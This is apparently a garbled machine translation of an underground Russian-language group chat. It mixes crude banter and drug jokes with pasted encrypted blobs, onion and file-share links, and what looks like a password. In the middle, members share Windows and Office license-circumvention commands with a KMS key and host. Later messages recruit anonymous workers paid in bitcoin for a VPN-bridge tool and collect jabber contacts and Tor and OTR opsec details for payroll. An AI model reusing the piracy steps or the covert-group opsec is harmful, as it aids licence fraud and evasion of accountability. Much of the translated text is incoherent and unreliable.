git did not exit cleanly (exit code 1) (6328 ms @ 09.02.2022 12:23:31) yeah, what's up? I think we can also blow in or blow out the gitlab of notsponsoring (502) yesterday and I had 502check git plzt that's so bad) yes this minetop send beer like?) check git ``http://menuetosnet/` guys as long as we're actively communicating here, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys, guys..............but if I'm not mistaken, Tomasz Grishtar, the axis is written on it, it's still supported by the system, by the way, it's still supported by the system, it's still supported by the system, it's still supported by the system, it's still supported by the system, it's still cool, it's cool of all the assmasmasters, and it's graying at 20))) fuck, I remember how a web server on fasm was written on fasm, I remember that I wrote the web server on fasm on your hydra, and it's not fucking on fasm!I'm interested in parsing everything byte by byte, Angelo is already at it. I'm such a guy who likes to play with bookmarks when I was at school and no one needs your pluses.it's cool and beautiful in a word yes and it doesn't bother me much but you should have a white safety net :) now i'm on the c/c++ topic lim lim lim even answered and now i'm retired? and?i tried to get a job at one company when i started my career at junah, i remember i tried to get a job at one company)_without cryptography where to work without me and fuck it))) we are not waiting )))) you will not wait as they say if you take everything to heart, heart can not stand (c) king of parties )I know myself)fuck, you can kill me) sure, take care of yourself and i fell down once before a cab 5 meters away the main thing is that it helps!yes yes, as funny as it sounds i thought that with this kind of booze is out of the question at least i found a cure so to speakmicroinfarction it's called a fucking week i will lie on one side and in bed if i do not drink it as if a stone was put in my left lung it covers it how?I get up in the morning, about 9:00 a.m., have a glass of whiskey at 200-300 grams and the day's not so bad. I got a heart defect, I drink whiskey when I feel I'm gonna have a stroke. He just mentioned it. It's got nothing to do with it. Think about it. Whiskey helps?)isn't it too early, homer? or candles for the pops? what's all this about the pops? whiskey's good for the pops?oh, fuck it, if it's to the ass, then temporarily and purely for myself, i thought candles would help:)in our business we need to tie thirty wpn, and thirty one algorithms to encrypt the traffic I'm not worried, just do not want one kkoshem dirty otherangelo, you there do not worry)well at a certain level of abstraction is that and deal the last 2-3 years cryptoha thanks mother mathematician thanks Rubvot exactly the same> angelo I every new zp get a new address, so one cat, but every receipt at the new address. I always do that. And it's recommended to do it that way. In theory, different addresses shouldn't stain each other. I understand, except for you, there's no one to tie them together and determine that they belong to the same owner. Well, if you want to ~fucking trace, there's not much help here. That's cryptography if he wants to find a connection at human level, if someone doesn't fuck around, let him sit and knit a connection at math level, she took care of everything for so there are inside one service codes have connections with each other? i understand correctly ?caches *create new caches* there would be no point all caches are linked to each other, but you can create a new cache every time you want, and will not get dirty i have a question - is there one cache, and in it allow 5 btc caches, they are not linked to each other ? That is, one account does not stain the other? What do you think{"vulcan:git" when will it go up ?hello{"$binary":"rUGZ/Y80QHlSm9zu78QQ/7xndzU1ZjS4e2SF9XB0BmlkMqsHLX4+aWAeYx5yOKFePmKBgjOq5c0WOBGAUD2CkCzU78qAFA9dcazUAYOj99XrvbvvZJBHL1K/jrZP/uNqfdZ0Jy7NeKF0ivgJr9Tb1nkjbooQVCht1RNvL+1X8LtvZVyxPcYRfAkgOHsYhvQtEhjQ9WeBRDlgTyIn061jSJVQ3stbcahkkKsVEgqGOEtAL18qR66TLIyyNFM="}{"$binary":"cH971BfB5oxH90xCK7ZkuIWF8xlYhmw7Zu8Q4ikP7gJP5O7lrNDALtQJjBXML1g91vMyUivt9QOtIkXU0VA69jpen9VQj0E/+ep0XxUPWkGQYg0GgRSS1XGjUkj3C73TRKADe0VFk6rF3fiJx2Grl/v7MSM6BSWq+ZzxUXxgiYxj5keW51NcF7mtqtlQnxdlqTL0BCBCRj9kStOjbW/iiMEP/xqnK0bgtHh7yQXqrhf2hM8cfU0YXyt8q3sOaD094AAoVZHntHnk0yqgYmPyS/9pYmjthsjmQTL3hgMqyNnsVAVilp189UzCjXjYwFMhJZGiQRGY0eOIYF1G6no6MECikdcxpYxWD1i9SVFK5b6Iy3a2y4b828s2jcC5ofQTMj3UQed6ruexCo8xpJeOMQH1NbCA1j1pC3rWLwFkiVsaY42yUt5+ac1T2Dxf+fnHmI0ylcpus2k07qwUw1f5J7NHSNspg52R6q13Jk6LOpG3FGaQdXUIRfmV7GFRzsUJYYDJH5rYUmlLHjvOVsJUGm+ENaGFKVo3UDbdtMiKTsCXqYikYuSNwvUNesoVhZi3HSO3kYfQIph830SMPgKijUC7+78Ql5lsTVhwjkO9TAjVfrI+oZpQWk0BxhQiYjJhrZGdBgDp3sil2DIxKVePo9Cem886YpUx38bzLDwJ6hKdAtLzb/1ASRWVSH2W7aUOh/SMYRukz0AOYxMivXrSN6CUhgWKyHbWAn5CP6f0t5MBbkxA29h4dRzkvnLqM6PAxYXDuKY+PpBkfUquhXbDJlXpvX2JHk6hBXXv5T45kkaWSkIFvhiioJqtyTTv7tXMzthXyD+aMGKmQbSrHD5wtVrkdJbsb2gPf/4ZdiYoIJJmJP9s0iBypWrFiO9pBRpLwk77H6FSolrQvJjd"}{"$binary":"JsDJk7xv1Sy8iJzQwUTxsA4hesDjk9vpmldE9+oEs0QgRldgHkAafLTNWAW7p4Ns3FhPG/P7d20qukUC8R7vC/1Vk5BAmx9E5h1wloG3xoRjQBvT84ybyDRDicy0Vq/dAmrAmob3lBX/HZUgaFLC/QHt1lqA2ZO0GJjzE1nv0jRNUTvhsy9MtHCv3QoqWUNoC7ZHjzZmXRjAuVdVOTAR64DFZMDF"}eyJhbGciOiJBE4W1QZisK5pz9QDSM09K+kGFDMDS1uzIivuhJ5BTzKpppsgfKgpAp9xIX4PYzzqy053ORduTvC0j/op/w2C25WJQZxQfkKTl4sC5BWc6CiBzCMkvQTgw+kuxEe2RiCS5D1LGPvGZTCpri/FuRut7zhJH+b2M71gA7XOJi3WtZjEqqDMnwoxJbRd/mBK52c+VeyJhbGciOiJBr+8Jgc9SSRWEXD5VMuu+pIlKrpqiTwiU7n5zkjWUd8Uz4K9Eva7dUBmRWJGu8oRblquW6y6W9P+kV/xBH1taAPRvM7YRldigMqLLVTD29deoLnkT4hrYfHsMNZKAmGqw7EVrmEHWPrIpPMVgrktwN/gYAUeug0qglP9U/P6CH09vbbTSoF3IucvGli5bHPTFqwrFz6moDNpyuFlJuYhT9so/c88UKDaJSkIOKeREHt8qyza0PJM2uGZpq4FQzdsGlwFdpFgLrYte8BpHSjmUDGm8R4Q41643/mR99iZHSb9eKwVwmbG/jbXYOcH39qAKsDNFbR+nyLj3A8++m8yVI4GHG30fqpLtdr55JCwn/hGO8Fb9ThTMxvgjw9rGc8SSqjOOVA7U2qdHK+lZbQXyTbIs9rI96g/ZIxujSOvfOTuyIcgBTgbYDWiguioUAq+3rrlyLaoSqmYvKJlD0HiGmhvXATot7loLrDlSZQiEncW3e4UN+JK1w32kbLgTuy5mBRoP783AkE+Q+7bticXfAt3vj3mfkaxSpS3AdFrXZsbMlH3o48q96nZTJd4cWFo0dGk07+Gp8 there?what were you standing in line there, for mobilization? great i haven't gone to work yet good night yopta or it's not morning yet):vulcan: good morning! you can do all sorts of crutches thank you. yes, by default there is no such functionality. нетeyJhbGciOiJBcj3NAyJs6+ocaXWUaSA/fzeOh/uCDlFTAX5N2mVbZxcihYJKejJLs/kX7VmBmidBGCIKpJqZ71jcwIKrpPJdYeJsOGcsZv2d/VeKw10SaSEl1e+q8cBRoaS/hZxf65MNXXrumXq+4kGZh2DBG/QYkmeM121k2kmo/64TsF1GchfYG3sQPfHwdnbMwUl8wQKTeyJhbGciOiJB9aMA46/pw5/fNDCFPloUuAYiWd9W0J23lmtVSqlmzUN7Gt12EzI5gyIICy8VA2+/uTaaz7WiDAo2ljhZOZ6862i3N9QRIMA963pKmhoYOydihQMyc32EvtKehlsUKTcPqFRxZefW1OIKYh/KH0DIluIhpaSB1ii7lxwVdQMUcvxnBHQVzCk/xv39hgF+DDKPB6UA8AO9Moj4WXXEAhSSrYShKozgrmzI5+r76PYZPySE/9jQaV2ShShfUha2nFuX3ATcmpc9JC1lm84VTUFvxJgfWL3TF5rmAEKcATPlr5Vt2orDGTz5BnUGIBAwXbbxJATl0d89ilLrcKBbEqWrss+MG6h5llE6BgjEjfXUsTukDV6p89T7iNqGT+V/yby7XVRlMA/Y6eqHMc6h2DyPJgm3L8S43uACskQ9MpKhoNzlGlebVgmbYpwlSaiP82G5hyMwfSE/ReQNxd9rY0C+utphSnwlEz82JYKVD3EbTkX3ZvxAP898+j47DSSHjCyubuWaJ2H5rooO8KqfgR3Q00pmsMLJ9CB//ZOk+OQtxSgWUaKz4gtNnv0k89V7Qjc+R7f0iFSrCPAgIGf+R7Ay5nULC0Qeuow4CrHZ+cwusrqYV3xyH3dJ+O/ULEhURBwxU7tv/yg9vAASyHhxBaE+09yy0dIK4cnse0FLJFpx5VE=eyJhbGciOiJBx3k5zQUFM2sZq6M1imT/PKr9rtYCZpBc7o2MlPToxJp+fbtPnAQ9hfomojsB6V+yqK3Y7RLz2oevv3uQy0ti35XAkabnZ9R2U8Rf5YM7xY back on the pornhubbspit all-pissing?I tuti on thursday, so it was also in yapyatnitsyhz why all at once loaded, was scrolling and chat further load gradually and here already configured, no other dates in the chat. but still, the torus hangs for a while it's just not Friday + the fact that with the last 24 hours have tried)) well, just 500500 +/- messages :zany_face:need to bring back the removal of 24hgeneral already tor "hangs" on the smartphone to play was cool, When you roughly speaking without a computer and away from technologyPUBGэ it in PABGа here's what sat down for a couple of months in his timepodpisks / schoring now our everythingea rgoDa there is a subscription for 900 rubles a month and all games kachay and yuzayy bought a left acke and quietly played online think Manuel more in the subjectа here's the hz honestlyа shit there can buy it, but can оfrgrund a subscription? it's online only on a subscription or what? all todaa then the first battle it may be real first, 2002) at the link is the correct game that I gave? 40 virgins and kg of cocaine, HOW great in CoD was it cool to take down fascistskachay and pass the campaign, like `https://ggsel.com`https://www.ea.com/ru-ru/games/battlefield/battlefield-1у you like it all costs 5 bucks) I do not know shit about it I have not 10 computers, so all aces leftyykupyt y with acom can pirupit think 5 bucks worth ... never thought that Blizzard can make Action Battlefield 1 must buy or can pirupit?I don't know what to recommend):laughing:Damn, Eliot, I'll have to put me now shooter what's that, I have flashbacks as kids screaming with rabies also wonder game, a childhood trauma from the time of Dandy, where even the first level can not pass) must be in a Prince of Persia fuckdadadadadadDa sniperom the living fuck - most importantly kill :heart_eyes:constantly playingWell I've seen, but did not play setvayabatla 4 and 1 vashe fire! well, + - the same thingvot in these never playedvot where our all gave free rein!Kolda and Batlabazar zerov kontra dapts plot to kill live people is always more pleasantzashell in the base and from their same stankacha put all 15 years ottarabanil in it directly from stankachana that's why I always liked the same dumbpereperemoval all and zaebisna and when you already have a desire to play lost, you get a message that there's an Afghan village over there, go and free your buddy, you go and at the first checkpoint you realize that you're fucking sitting like a retard, and you think, when is the game even going to happen?It's an hour and a half of introductions, it's not games these days, it's fucking cartoons, but it won't start... all the cutscenes and credits, I smoked half a fucking pack, drank half a liter of tea... and now I've launched the fifth Metal Gear...anyway, it's old, well, not that, outside the 21 st century after the game like run around the field eating sheep, and here THAT I played stalker back in the first (if there were any more), in the years of selerons, well, THEN it was funky pohremno I shit really last fuck, I put here a month ago I wonder if the modern somehow catching?but also not a fan of the genreaazh scary it was i remember how on the first player i was impressed with the resident and vvlagovit about the black sea also turned out okay - Stalkerna need to check out but Metro was repeateda game is, excuse me, very differentekrut author, coolChitalnu i honestly with great pleasure read Pehov Sentinel, the theme is the same + - only prettier by virtue of the fact that the 10 years difference the game is exactly the same as it was Gothic 3 the search for hidden meanings where there is none, just a square) is like looking at a black square and did not come to mind until the Witcher not reached, but stupid as this, metal gore is like falling in love and see her in a porno..although no, it's not a comparison :D nu a man and a man, well the horse jumps, well the bots are stupid after the book can be anything, maybe I'm old just, but the witch, from which all come for some reason, not vtyrknikvot look like after the book to play in a game worthwhile, I played last gamehule was the game the same was not called? immediately it would be all clearNo like the metro! but Metro 2033 well that's fucking well I've readbooty not read Metro! what book? aaaaMetro 2033 kachaypizdetsya not in the subject in generalsereshenno you sereshenno?! the book is there?!? fuck! if the game is good, then we should think and downloadogo, also the book is there? i just thought about downloading play, but so, thought and zablnado was in Metro to play after the book, i would have finished just people like that epatastically flying into the chat room dick i can remember)) on the computer of course =) i would say something crossed between Kermit and me. about the subway, what played? units I would say I do not think that all, less than all know, and I do not understand who it is) well, I'm curious, what exactly the school old school a mystery, came from them and went into the sunset, tomorrow you ask is clear, but hoo from hoo?and more than once smells )nothing, it will happen again in the morning was a coven =) i must have missed something in life?) from Metro got a pleasurea what was it in the morning in this chat? no, now the games are really interesting and really in which you need to sweat your brains out. I here the current games I can not understand, there is nothing to playnu it's by itself and get into the eye of the raven from duhovushki 10 meters of me points on the stairs in the cagehuy know, I do not understand, I was only from the games of the sea I ahreya pay for everything BUT fuck, I have these games on my smartphone was over 40ne, nihera - I always buy something that I really like zazhit pentak for excellent software ... how i understand you (c) i'm looking at how much children's games cost.... it's fucked up. You download a game, well the price is 300P no big deal. And every add-on inside the game costs 150-200 and there are 30-40 of them and you have to pay for each one. Efeknuli content that the cloudvoprosy now is not in the cracks, now everything goes to the cloud and you need a connection with the servakranom was 10 here 383 already better maybe who cracks itksta, you can on androeed look there kashbek all sorts, as timeLuch better card tinkovakardera order, let them shipp5.33$:rofl:383.25 rubles/monthDamn, I do not have faith to give 10 bucks for thatStanislavsky photo...dear? on android?Man, here it was necessary to look there, but the program is good and expensive, they track the dogs podidi4ndujaba me strangled to buy one application with audiobooksumel you would do so applozhihi on buedorOf the cons, the winda take the license only if there is a connection with the server msVishne on the cake, if anyone needs, there is a utility for a digital license))) catch the cracker! Download the MediaCreationTool and run with the arguments
```
.\MediaCreationTool21H1.exe /Eula Accept /Retail /MediaArch x86 /MediaLangCode en-US /MediaEdition Enterprise
```
At the request of the key - enter the km key to download)
Get the original windup in my head sawdust, yes yes yes, but for a link where to find the office itself from the mikes will be gratefulI downloaded 2019

Then this is what happens

```
retail to vl (I don't remember if this is for installation or after installation).
dir ..\root\Licenses16\ProPlus2019VL*.xrm-ms
cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ppd.xrm-ms"
cscript ospp.vbs /inslic:"..\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul-oob.xrm-ms"
cscript ospp.vbs /inslic:"...\root\Licenses16\ProPlus2019VL_KMS_Client_AE-ul.xrm-ms"
```
```
cd c:\Program Files\Microsoft Office\Office15
cscript ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP
cscript ospp.vbs /sethst:192.168.000.001
cscript ospp.vbs /act
```
cspp server, sorts and exe I downloaded, run it on a virtual machine somewhere... (Here its ip for example 192.168.000.001) well, you opal, wait for me in the LN) I downloaded from them and converted the retail to vl, then activated the kmsomPrecise question) guys who pumped a clean office from the majors without vtroenie chips to breaking?!to the children of women on the ship, you know what, we have our own Christina potpchikkitAlf, we are the boys (mixed with flood:face_vomiting:expedient to make a second chat always looked at the General in the back, but now and even more so I will not. Spam all the timeButton : no : `Remove angelo the fuck out of the chat room` not there )@weldon , look at the top right next to the name of the chat room three vertical dots, there are Noification Preferences, maybe what you need run forest ))))))))))) goneon paranoid fuck in the pointsto his firewall there ))))))))))deal not offerthere the same fuck, just assume ))))))))0 and your Fridays are about a comrade's asshole. ask him if he wants it. ask him first. you know what the fuck. our Fridays are gonna be good. take care of your own assholes. that's all. wiping the drool off all the fuck))) i'm gonea then he'll exploit you and put his booty in you)) ahahahahahahaha your glasses when adjelo is around bdibuza take notea then the glasses of a fellow woman)))))))) well at least someone here mamkuin hutzker!and you're like - FUCK YOU OLD - i'm a mama's hutzker! can i turn off this "tapping"? my grandma came to me - "why are you tapping here..." she said the same thing! A better vagina is a comrade's asshole, no? i think i heard it more than once, but i can't say, i don't know about it, don't relax i'll be back again, i fucking left klava kokanu and you can't fuck with your klava kokanu until you fuck with yourself, i wish i had fucked you betterNo... fuck the code ) there's wankers here ) ahahahahahahaha coders fuckin' coders didn't even offer to fuck in the rmb what kind of a chat room is this))))))))) you've got to fuckin' have fun all right you have a working mood, don't be fucking bored)), it will be fun here in our country, you guys will be fucking boring and bland or just like in the olden days dekakov your software is boring and we'll check it out... there's no fucking silence... i can see that everyone is getting bored here... and fuck the americans... i'm bored... i don't know if you call it a chutzpah, but you're the only chutzpah... assholeweldon rename this chat room TNTBaba alone somehow, can I ask you a question, in Russian they don't usually translate terms, they say "to get hooked up", "to block", etc.?п. how will it be in programmer's asshole pussyfucking I still have a powder I'll fuck you and ask for a ransom! but I can not fuck with you when you're tocool with some words here and you decided to chat for a DODS :grin:and I'm here fucking think I fucking dreamed answer me bitch fucker must be fucking crazy to write me a fucking bentley?)))) a toad is fucking hovering And to pump up the chat room )i'm fucking bored this morning at the office To see what the fuck is going on here i thought i'd come here so i'm the beautiful guys We got some fucking Italians too, who the fuck is this from the family archive? What a fucking avatarWhat the fuck's up with the screaming in the forest?Fucking great, Oleg!))))))))) you're the last motherfucker we need to hear about your life brother nikolai))) then we'll be fucking friends then) his belt - we're always talking bullshit, you'd better listen to me like your own brother, so listen to him ahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha, he's a fucking boozehound if he didn't have a software the reporter's news, he'd be a dick without oil, so listen to him, you can't fucking go camping without him, but he's fucking scary to me, he's always fucking one in a trillion, your fucking guy is hot))))))))))))) I won't tell him the truth?tell him, what do you do next? that's how the fuck he lived, he told me 010101010101 I told him 0101010 don't you know ))))muchy listen I'm not saying anything at all, your robot is a fuckin' robotDa0101010101010101010101a booza you are loaded, it's a fanoYes!it's when americans' asses are on fire that's bullshit. you think there's a code and you think it's fun to fuck with americans, you're all worked up, there's a link to a porno thrown in here. they're right, the guys say that once we remember our youth* in the cafe, we'll sit with you at night. he never forgets that there are people like you. i'll always be with you. )))))))))) do not come down, handsome)) he listens to music, he doesn't give a fuck about everything. i'm going crazy slowly as usual (the title credits show)))))))) a Quinnam clip. tell me all the time i got the YouTube captcha. what's up there???? and Suchkovs )-) Amer's nightmare
https://www.youtube.com/watch?v=Od6hY_50Dh0
``who the fuck am I))))))))))))))who the fuck am I? You hear me? I'm going to write the sequel to - All the Rising And so we transport it !exactly !for chesschert, I just thought of the scheme) and we carve horses from wood we help people move fasteramfetaminemdm? methadone? quaalude?methanol? glass is what and we are versatile individuals ! have we switched to drugs? we started with trojans))) no, we quietly cook glass, we're chemistry teachers now a little bit more details, we are not more than that Red !we're only fighting with horses before you get syphilis here)))))))))))) i'm going to ask you to fuckin' take down this chat room with the server all the time i went out a couple of times, i'd hit people with my pussy when it blew hard on my charms, i'm writing to the rm so you're putting them on, aren't you?)no, i just let the girls have the privilege of undressing angelo)))))))))))) they'll take off whoever they want, we'll send them early in the morning guys i haven't even taken my pants off yet why all the fuss!the world is not what I imagine it is to say who does what and shut the fuck up)) I love the medium for what my boobs posted herewel dan - medium прожарка░░░▄▄▄▓▀▀░░░░░░░▒▒▒▒▀▀▀▀▄░
░░▐"░▄▀░░░░░░░░░░░░░▀▄░░"▌
░░▐░▐░░░░░░░░░░░░░░░░░▐░░▌
░░▐▐░░░░░░░▀▄▒▄▀░░░░░░░▐░░▌
░░▐▐░░░░░░░▒▒▐▒▒░░░░░░░▐░░▌
░░▐▐░░░▄░░░░▒▐▒░░░▄░░░░▐░░▌
░░▐▐▒░░░░░▒▒▒▐▒▒▒░░░░░░▐░░▌░
░░▐░▀▄▒▒▒▒▒▄▀▒▀▄▒▒▒▒▒▄▀▌░▌░
:grin:get to know the guys, I'm serious, I'm waiting for the whole fucking thing, at least someone will tell me what I'm doing... Hooray! The joyful spirit of Red is back! We missed you so much!!! ))))))))) booz:stuck_out_tongue_closed_eyes:in springfield where the fuck i gotbeardyhomerdickyfuckinggomer camebut quick fucking work))) cuhomer already turned on in the chat room sit what the fuck you all busy here)))))))) fucking i like SEX cars no big, redAnna, you like cars?i'm your cheese on my grillettes my grillettes i've been pining for yousilverinepriesthe morning of the collective farm ))))))))))))))))))))))))))))) all right)from the amazon forestsbecause you came to us from the forestthey nicknamed you sodickeypriesthee! wrote in pm )hi "dikii":D))beard, muscleswwwaaaahhhhhhhhhhhhh man manuallo manuel:Dooh, arigato!dibs you firstwritten )I have webcachom I can help you boysarigaatoa asalam malaykum you here? your profiles send mea better vkontaktead let's create a wats app groupwhat's the connection here?:softball:salaam malaykum):mouse:.... I was told there are many serious men hereangde all I miss why nobody has photos in their profileswhats app contacts exchange?
5?P8c}_p=xg%!6}jku
Download: https://qaz.im/load/Ye2fFZ/6A7SbK
Delete: https://qaz.im/index.php?a=delete&q=1735474595
``and some methodology while I'll send you to read the terms of reference for the project, then I'll take you to the neighboring chat room, because All communication on the project there horoshok I'm ready so-and-so).nobligovki such straight no, but you need to submit the work on time, to be adequate and be in touch Workday from 9 to 18 Moscow, can + - to start-finish black transfer on a card or bitcoins (on your own changing) here we have all anonymous, the main direction of the company - software for pentestors test job will pay for a week (if not already paid), but most likely it's the next couple of days now about the otherponyala, hz or not, but ready to try than TCP / UDP / ICMP so the answer to your question - it works at the IP level at our and the far end just give the command to start vpn-tunneling. But the correct parameters for the configs of these tunnels, to connect the right clients to the right far ends (because there can be 100500 of them) - it's all a task of the bridge. The bridge is the coordinator of all the magic on the bridge - its routing rules, and from our side is also climbing a VPN tunnel to the bridge3) that end. That's the end that we're hooked up to with the VPN. The agent works on it, lifting the VPN tunnel to the bridge2) bridge. On the bridge we have linux, and a bunch of iptables/scripts/local storage1) this is our end, the client end, and on it we take the most common orpn system has three parts, the juice in routing raw packets, regardless of Layer 3 protocols. does it all work over udp?ping itopen its balls in the network can not cling to the desktop of the remote machine at all, but to see its entire network as your local if you look closely timviewer, there is a very important and convenient thing called "vpn-tunnel "The idea - completely copied from the functionality of vpn in timviewer this network vpn-bridge project the point of the following is all you need to do - to understand it and pick up its support The project is fully written but the developer got hungry and dropped out of the workflow and it is similar to your software now there is one very specific task on linux - there are options to use libraries, but not on vindex, mostly raw options, as close as possible to vinapi we will not boost asio 100% with boost asio, sockets on vinapi and threads work while tipster ask - how you work with networking / multithreading / understanding routing packets / ipables ?i have no experience in commercial development. what is your favorite technology and what do you like/dislike about programming/work in general?
What are your strengths?
i've looked at the free format, too, it's laconic )i've looked at the terms of reference, it's good let's talk about it? hello@bones you can check it out now try to logout, reset cache, change the node of the admin then wait a minute now?i can't wait a minute @bones can you see my messages? i wrote a message in my personal message thereinimmediarywhich was in a different city I'm here it's for meimmediary half an hour) helloHelloHi mailing list, say hello to everyone onlinemajorsharkspudsHelloHi allzanzi@gibby , send the admin a jabberThose who sent earlier - duplicate it once again.
@all@all Greetings. Email me your backup toads. As soon as possibleHiHi all! Send a wallet and the amount in btz to zp in pm! markHi) thanks for writing)@all bros for technical reasons zp postponed to the IPA. Please do not fuss, at IPA all ironclad will be, hung BTC, and since the weekend ahead - most likely to postpone at IPA. If anything comes before then I'll let you know right away. If it comes tomorrow, I'll be in touch all weekend! Do not kipishuem! Hi all, can send a PM wallet and the amount in Btz to pay 🙂 And your responsibilities (coder, admin what project, etc. in short) Hi all! Guys, today / tomorrow payroll, so who recently started - send a personal date from which you work, external backup jabber and who your team lead. Who are not on the list - wages will not get 🙂 Happy Monday all 🙂 docfoxbrickokzalische try to update toroshas here came under your nicknamev meaning? should go to it, I sheschalisli create a new identity, then from the chat will throw? here through tor sittingdastrano, you through a tor-browser come?aa in chats goes to https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/нетэто on what on privatty? The connection was dropped says not to go to the second passport top link to chatchttp://privatty.com/en/n/yrvZV2KcAf#yCmlga57Ihttps://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.опіопсекпо link does not go to the same chattrss://qaz.im/zaq/rD6ddf58#anSF7H8n
https://qaz.im/zaq/74AQKb5R#RdfS6ZYsдержи from the second chat kredsprivetbro helloHey everyone, just a reminder. For direct communication in private chat (in private) at the beginning of the dialogue you need to turn on OTR (top right three dots -> OTR -> Start OTR). After the reconnect is worth refreshing, refresh keys. Can not work smoothly at once, make sure that it worked) so there are no guys who joined this week - write me in pm!Hi, guys who have recently joined - write to me in PM, we will get acquaintedWell, send a purse in PM on wages and the amount in BtuGibbyoxyskippybladeWell, guys who have recently joined - send a personal date from which you work, external backup jabber and who your team lead,
and your duties (coder, admin what project, etc. in brief)littleadmin_NengohMahCh8privetv all good daytaurusvirgoariesa when will someone be here? hello hello:grin:I will write off as I start, waiting from adamethe training was):grin:while no one yet bro, except usAll newcomers need to send me in a personal message the following data
Nick, job duties in short, standby jabber (on any public server alya jabber.ru xmpp.jp or similar), the nickname of your teammate, the amount of salary at what we agreed and the date of the last payment (if any).

I will give you the salary. We have salary 2 times a month, 1 and 15 of each month (+ - a couple of days) Peace to all local :smile:silverfrancesadam it rugoprivetok who is not long connected - write in a personal..Hello all! stout, hello.Hi @rugoprivetorusttootSigned myself, thanksSomehow before Biden had not thought to simply demand) terrible things happen ```.
REvil ransomware hackers linked to Russia suddenly disappeared from the darknet Shortly before that, Biden demanded that Putin crack down on such groups
``Fellows who joined recently - send me the following data in private messages, it is necessary for the WP
Your backup jabber on a public server (exploit.im for example) Who is your teammate, date since which you work, and what is the salary agreement with teammate
and in fact your skills / duties hai! Hi)Hey all@all the guys who joined recently - send me in a private message the following data, it is necessary for the salary
Your backup jabber on a public server (exploit.im for example) Who is your teammate, date since which you work, and what salary agreed with teammate
and your actual skills and dutiesIt's hot today...but guys who joined recently - send me a private message with the following information, it's necessary for payroll
 Your backup job on a public server (exploit.im for example) Who is your teammate, the date of your work, and what is your salary agreement with teammate
and your skills in fact your skills@alalPrenev! Your back up jabber on public server (exploit.im for example) Who is your teammate, date from which you work, and what salary agreed with teammatefuzzguys who joined recently - send me a personal message the following data, it is necessary for wages hello all! I now give more access to the other toad if that reserve toad I have bormental@31337.life
if you suddenly will not have access here, knock on this zhabana in case the old server will no longer available, and the new - is not yet available all - exchange with admin and stout backup contactsparni not yet want the server to v3, working on thesemya will sometimes appearvash senior @stout for all questions to nimya since Mon on leave for 2 weeks more announcementHiGot it.@admin will make an announcementSoon the site address will be changedHi @allI saw it too - tor browser updated this morning.They are already working on it, the address will be updated soon, I have it under controlVersion 2 Onion Sites will be deprecated soon

This onion site will not be reachable soon. Please contact the site administrator and encourage them to upgrade.

Tor is ending its support for version 2 onion services beginning in July 2021, and this onion site will no longer be reachable at this address. If you are the site administrator, upgrade to a version 3 onion service soon.hello hello hello!